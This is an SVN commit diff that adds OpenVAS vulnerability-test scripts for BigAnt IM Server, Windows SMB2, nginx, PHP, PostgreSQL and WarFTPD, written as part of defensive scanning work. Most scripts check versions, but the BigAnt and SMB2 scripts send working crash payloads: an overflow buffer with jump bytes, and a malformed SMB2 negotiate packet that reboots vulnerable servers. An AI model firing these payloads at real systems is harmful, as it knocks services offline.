2009-10-01 16:57:31 UTC (rev 5349) @@ -88,4 +88,14 @@ CVE-2009-3473 SecPod CVE-2009-3472 SecPod CVE-2009-3478 SecPod - +36407 Greenbone svn R +CVE-2006-5789 Greenbone svn R +CVE-2009-2629 Greenbone svn R +CVE-2009-3229 Greenbone svn R +CVE-2009-3230 Greenbone svn R +CVE-2009-3231 Greenbone svn R +36438 Greenbone svn R +36555 Greenbone svn R +36554 Greenbone svn R +36490 Greenbone svn R +CVE-2009-3103 Greenbone svn R Added: trunk/openvas-plugins/scripts/BigAnt_36407.nasl =================================================================== --- trunk/openvas-plugins/scripts/BigAnt_36407.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/BigAnt_36407.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,96 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100278); + script_bugtraq_id(36407); + script_version ("1.0-$Revision$"); + + script_name("BigAnt IM Server HTTP GET Request Buffer Overflow Vulnerability"); + +desc = "Overview: +BigAnt IM Server is prone to a remote buffer-overflow vulnerability +because it fails to perform adequate boundary checks on user- +supplied input. + +An attacker can exploit this issue to execute arbitrary code with the +privileges of the user running the server. Failed exploit attempts +will result in a denial-of-service condition. + +BigAnt IM Server 2.50 is vulnerable; other versions may also be +affected. + +NOTE: This issue may be related to the vulnerability described in BID + 28795 (BigAnt IM Server HTTP GET Request Remote Buffer Overflow + Vulnerability). We will update or retire this BID if further + analysis or reports reveal that the two records represent the + same vulnerability. + +Solution: +Updates are available. Please contact the vendor for details. + +References: +http://www.securityfocus.com/bid/36407 +http://www.bigantsoft.com + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if BigAnt IM Server is prone to a remote buffer-overflow vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Buffer overflow"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","BigAnt_detect.nasl"); + script_require_ports("Services/BigAnt", 6660); + exit(0); +} + +include("http_func.inc"); + +if(safe_checks())exit(0); + +#port = get_kb_item("Services/BigAnt"); +port = 6660; +if(!port)exit(0); +if(!get_port_state(port))exit(0); + +payload = crap(data:raw_string(0x41), length: 985); +payload += raw_string(0xeb,0x06,0x90,0x90,0x6a,0x19,0x9a,0x0f); +payload += crap(data:raw_string(0x90),length: 10); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +req = string("GET ", payload, "\r\n\r\n"); +send(socket:soc, data:req); +if(http_is_dead(port: port)) { + security_hole(port:port); + exit(0); +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/BigAnt_36407.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/BigAnt_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/BigAnt_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/BigAnt_detect.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,71 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# BigAnt IM Server Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100280); + script_version ("1.0-$Revision$"); + + script_name("BigAnt IM Server Detection"); + + desc = "Overview: +This host is running BigAnt IM Server, a instant messaging solution +for enterprise. + +See also: +http://www.bigantsoft.com/ + +Risk factor : None"; + + script_description(desc); + script_summary("Checks for the presence of BigAnt IM Server"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + exit(0); +} + +include("http_func.inc"); +include("global_settings.inc"); +include("misc_func.inc"); + +port = get_http_port(default:6660); +if(!get_port_state(port))exit(0); + +banner = get_http_banner(port: port); +if(!banner)exit(0); + +if(egrep(pattern:"AntServer", string:banner)) + { + register_service(port:port, ipproto:"tcp", proto:"BigAnt"); + if(report_verbosity > 0) { + security_note(port:port); + } + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/BigAnt_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl =================================================================== --- trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/ms_smb2_highid.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,121 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100283); + script_bugtraq_id(36299); + script_cve_id("CVE-2009-3103"); + script_version ("1.0-$Revision$"); + + script_name("Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability"); + +desc = "Overview: +Microsoft Windows is prone to a remote code-execution vulnerability +when processing the protocol headers for the Server Message Block +(SMB) Negotiate Protocol Request. + +NOTE: Reportedly, for this issue to be exploitable, file sharing must + be enabled. + +An attacker can exploit this issue to execute code with SYSTEM-level +privileges; failed exploit attempts will likely cause denial-of- +service conditions. + +Windows 7 RC, Vista and 2008 Server are vulnerable; other versions may +also be affected. + +NOTE: Reportedly, Windows XP and 2000 are not affected. + +UPDATE (September 9, 2009): Symantec has confirmed the issue on +Windows Vista SP1 and Windows Server 2008. + +i +References: +http://www.securityfocus.com/bid/36299 +http://blog.48bits.com/?p=510#more-510 +http://www.microsoft.com/technet/security/advisory/975497.mspx +http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx +http://www.microsoft.com/windows/windows-7/ +http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1 +http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx +http://www.microsoft.com/windows/products/windowsvista/default.mspx +http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html +http://www.securityfocus.com/archive/1/506300 +http://www.securityfocus.com/archive/1/506327 +http://www.kb.cert.org/vuls/id/135940 + +Risk factor : High"; + + script_description(desc); + script_summary("Determine if Microsoft Windows is prone to a remote code-execution vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Windows"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "smtpserver_detect.nasl"); + script_require_ports(445); + exit(0); +} + +include("misc_func.inc"); +include("network_func.inc"); + +if(safe_checks())exit(0); + +port = 445; +if(!get_port_state(port))exit(0); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +data = raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x53,0xc8, + 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xff,0xfe, + 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f, + 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02, + 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x64,0x6f, + 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x75,0x70, + 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30, + 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4e,0x54, + 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x32,0x2e, + 0x30,0x30,0x32,0x00); # Tested against 2008 Server. A vulnerable Server doing a reboot. I'm not happy with that, but a the moment i have no idea how to detect this vulnerability without exploiting it. + +send(socket: soc, data: data); +close(soc); + +sleep(2); + +soc1 = open_sock_tcp(port); + + if(!soc1) { + security_hole(port:port); + exit(0); + } else { + close(soc1); + } + +exit(0); + + Property changes on: trunk/openvas-plugins/scripts/ms_smb2_highid.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_36384.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_36384.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_36384.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx HTTP Request Remote Buffer Overflow Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100276); + script_bugtraq_id(36384); + script_cve_id("CVE-2009-2629"); + script_version ("1.0-$Revision$"); + + script_name("nginx HTTP Request Remote Buffer Overflow Vulnerability"); + +desc = "Overview: +The 'nginx' program is prone to a buffer-overflow vulnerability +because the application fails to perform adequate boundary checks on +user-supplied data. + +Attackers can exploit this issue to execute arbitrary code within the +context of the affected application. Failed exploit attempts will +result in a denial-of-service condition. + +Solution: +Updates are available. Please see the references for more information. + +References: +http://www.securityfocus.com/bid/36384 +http://nginx.net/CHANGES-0.5 +http://nginx.net/CHANGES-0.6 +http://nginx.net/CHANGES-0.7 +http://nginx.net/CHANGES +http://nginx.net/ +http://www.kb.cert.org/vuls/id/180065 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if nginx is prone to a buffer-overflow vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("nginx_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0); +if(!isnull(vers) && vers >!< "unknown") { + + if( + version_is_less(version: vers, test_version:"0.5.38") || + version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.38") || + version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.61") || + version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.14") + ) { + + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/nginx_36384.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_36438.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_36438.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_36438.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,87 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx Proxy DNS Cache Domain Spoofing Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100277); + script_bugtraq_id(36438); + script_version ("1.0-$Revision$"); + + script_name("nginx Proxy DNS Cache Domain Spoofing Vulnerability"); + +desc = "Overview: +The 'nginx' program is prone to a vulnerability that may allow +attackers to spoof domains because the software fails to properly +compare domains when referencing an internal DNS cache. + +This issue can be exploited when nginx is configured to act as a +forward proxy, but this is a nonstandard and unsupported +configuration. Attacks against other configurations may also be +possible. + +Successful exploits may allow remote attackers to intercept traffic +intended for legitimate websites, which may aid in further attacks. + +References: +http://www.securityfocus.com/bid/36438 +http://nginx.net/ +http://www.securityfocus.com/archive/1/506541 +http://www.securityfocus.com/archive/1/506543 + +Risk factor : Low"; + + script_description(desc); + script_summary("Determine if nginx is prone to a Proxy DNS Cache Domain Spoofing Vulnerability"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("nginx_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0); +if(!isnull(vers) && vers >!< "unknown") { + + if( + version_in_range(version:vers, test_version:"0.8", test_version2:"0.8.15") || + version_in_range(version:vers, test_version:"0.7", test_version2:"0.7.62") || + version_in_range(version:vers, test_version:"0.6", test_version2:"0.6.39") || + version_in_range(version:vers, test_version:"0.5", test_version2:"0.5.38") + ) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/nginx_36438.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_36490.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_36490.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_36490.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx WebDAV Multiple Directory Traversal Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100275); + script_bugtraq_id(36490); + script_version ("1.0-$Revision$"); + + script_name("nginx WebDAV Multiple Directory Traversal Vulnerabilities"); + +desc = "Overview: +The 'nginx' program is prone to multiple directory-traversal +vulnerabilities because the software fails to sufficiently sanitize +user-supplied input. + +An attacker can exploit these issues using directory-traversal strings +('../') to overwrite arbitrary files outside the root directory. + +These issues affect nginx 0.7.61 and 0.7.62; other versions may also +be affected. + +References: +http://www.securityfocus.com/bid/36490 +http://nginx.net/ +http://www.securityfocus.com/archive/1/506662 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if nginx Version is 0.7.61 ot 0.7.62"); + script_category(ACT_GATHER_INFO); + script_family("Web Servers"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("nginx_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("version_func.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + +if(!vers = get_kb_item(string("nginx/", port, "/version")))exit(0); +if(!isnull(vers) && vers >!< "unknown") { + + if( + version_is_equal(version: vers, test_version: "0.7.61") || + version_is_equal(version: vers, test_version: "0.7.62") + ) { + security_warning(port:port); + exit(0); + } + +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/nginx_36490.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/nginx_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/nginx_detect.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/nginx_detect.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,91 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# nginx Detection +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +# need desc here to modify it later in script. +desc = "Overview: +This host is running nginx. nginx [engine x] is a HTTP server and mail +proxy server written by Igor Sysoev. + +See also: +http://nginx.net/ + +Risk factor : None"; + +if (description) +{ + script_id(100274); + script_version ("1.0-$Revision$"); + script_name("nginx Detection"); + script_description(desc); + script_summary("Checks for the presence of nginx"); + script_category(ACT_GATHER_INFO); + script_family("Service detection"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("http_func.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); +if(!get_port_state(port))exit(0); + + buf = get_http_banner(port: port); + if(!buf)exit(0); + + if(egrep(pattern:"Server: nginx/" , string: buf, icase: TRUE)) + { + vers = string("unknown"); + ### try to get version + version = eregmatch(string: buf, pattern: "Server: nginx/([0-9.]+)",icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + } + + set_kb_item(name: string("nginx/", port, "/version"), value: string(vers)); + + info = string("None\n\nnginx Version '"); + info += string(vers); + info += string("' was detected on the remote host."); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/nginx_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl =================================================================== --- trunk/openvas-plugins/scripts/php_restriction_bypass.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/php_restriction_bypass.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,94 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# PHP multiple Restriction-Bypass Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100281); + script_bugtraq_id(36555,36554); + script_version ("1.0-$Revision$"); + + script_name("PHP multiple Restriction-Bypass Vulnerabilities"); + +desc = "Overview: +PHP is prone to a 'safe_mode' and to a 'open_basedir' +restriction-bypass vulnerability. Successful exploits could allow an +attacker to access files in unauthorized locations or create files in +any writable directory and in unauthorized locations. + +This vulnerability would be an issue in shared-hosting configurations +where multiple users can create and execute arbitrary PHP script code; +the 'safe_mode' and the 'open_basedir' restrictions are assumed to +isolate users from each other. + +PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be +affected. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/36555 +http://www.securityfocus.com/bid/36554 +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/standard/file.c?view=log +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/standard/file.c?view=log +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/posix/posix.c?view=log +http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/posix/posix.c?view=log +http://securityreason.com/securityalert/6601 +http://securityreason.com/securityalert/6600 +http://www.php.net + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if php version is 5.3.0 or 5.2.11"); + script_category(ACT_GATHER_INFO); + script_family("Web application abuses"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("gb_php_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + +include("version_func.inc"); + +phpPort = get_kb_item("Services/www"); +if(!phpPort){ + exit(0); +} + +phpVer = get_kb_item("www/" + phpPort + "/PHP"); +if(!phpVer){ + exit(0); +} + +if(version_is_equal(version:phpVer, test_version:"5.2.11") || + version_is_equal(version:phpVer, test_version:"5.3.0")) { + + security_warning(port:phpPort); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl =================================================================== --- trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,93 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# PostgreSQL Multiple Security Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100273); + script_bugtraq_id(36314); + script_cve_id("CVE-2009-3229","CVE-2009-3230","CVE-2009-3231"); + script_version ("1.0-$Revision$"); + + script_name("PostgreSQL Multiple Security Vulnerabilities"); + +desc = "Overview: +PostgreSQL is prone to multiple security vulnerabilities, including a +denial-of-service issue, a privilege-escalation issue, and an authentication- +bypass issue. + +Attackers can exploit these issues to shut down affected servers, +perform certain actions with elevated privileges, and bypass +authentication mechanisms to perform unauthorized actions. Other +attacks may also be possible. + + +Solution: +Updates are available. Please see the references for more information. + + +References: +http://www.securityfocus.com/bid/36314 +https://bugzilla.redhat.com/show_bug.cgi?id=522085#c1 +http://www.postgresql.org/ +http://www.postgresql.org/support/security +http://permalink.gmane.org/gmane.comp.security.oss.general/2088 + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if PostgreSQL is prone to multiple security vulnerabilities"); + script_category(ACT_GATHER_INFO); + script_family("Databases"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("postgresql_detect.nasl"); + script_require_ports("Services/postgresql", 5432); + exit(0); +} + +include("misc_func.inc"); +include("version_func.inc"); + +port = get_kb_item("Services/postgresql"); +if(!port)port = 5432; +if(!get_tcp_port_state(port))exit(0); + +if(!ver = get_kb_list(string("PostgreSQL/Remote/", port, "/Ver")))exit(0); + +if( + version_in_range(version:ver, test_version:"8.4", test_version2:"8.4.0") || + version_in_range(version:ver, test_version:"8.3", test_version2:"8.3.7") || + version_in_range(version:ver, test_version:"8.2", test_version2:"8.2.13") || + version_in_range(version:ver, test_version:"8.1", test_version2:"8.1.17") || + version_in_range(version:ver, test_version:"8.0", test_version2:"8.0.21") || + version_in_range(version:ver, test_version:"7.4", test_version2:"7.4.25") + ) +{ + security_warning(port:port); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/warftpd_20944.nasl =================================================================== --- trunk/openvas-plugins/scripts/warftpd_20944.nasl 2009-10-01 10:15:29 UTC (rev 5348) +++ trunk/openvas-plugins/scripts/warftpd_20944.nasl 2009-10-01 16:57:31 UTC (rev 5349) @@ -0,0 +1,99 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# WarFTPD Multiple Format String Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100282); + script_bugtraq_id(20944); + script_cve_id("CVE-2006-5789"); + script_version ("1.0-$Revision$"); + + script_name("WarFTPD Multiple Format String Vulnerabilities"); + +desc = "Overview: +WarFTPd is prone to multiple remote format-string vulnerabilities +because the application fails to sanitize user-supplied input before +passing it to a formatted-output function. + +An attacker can exploit these issues to crash the server and possibly +to execute arbitrary code within the context of the server, but this +has not been confirmed. + +WarFTPd 1.82.00-RC11 is reported vulnerable; prior versions may be +vulnerable as well. + +Solution: +Updates are available. Please see the references for details. + +References: +http://www.securityfocus.com/bid/20944 +http://support.jgaa.com/index.php?MenuPage=product +http://www.securityfocus.com/archive/1/506443 +http://www.securityfocus.com/archive/1/450804 + + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if WarFTPd version is WarFTPd 1.82.00-RC11"); + script_category(ACT_GATHER_INFO); + script_family("FTP"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("ftp_func.inc"); +include("version_func.inc"); + +port = get_kb_item("Services/ftp"); +if(!port){ + port = 21; +} + +if(get_kb_item('ftp/'+port+'/broken'))exit(0); + +if(!get_port_state(port)){ + exit(0); +} + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +banner = ftp_recv_line(socket:soc); +if(!banner)exit(0); + +if(!version = eregmatch(string: banner, pattern:"WarFTPd ([0-9.]+[-RC0-9]*)"))exit(0); +version[1] = ereg_replace(pattern:"-", string:version[1], replace:"."); + +if(version_is_equal(version: version[1], test_version:"1.82.00.RC11") || + version_is_equal(version: version[1], test_version:"1.82.00.RC12")) { + security_warning(port:port); + exit(0); +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/warftpd_20944.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Thu Oct 1 21:02:19 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 1 Oct 2009 21:02:19 +0200 (CEST) Subject: 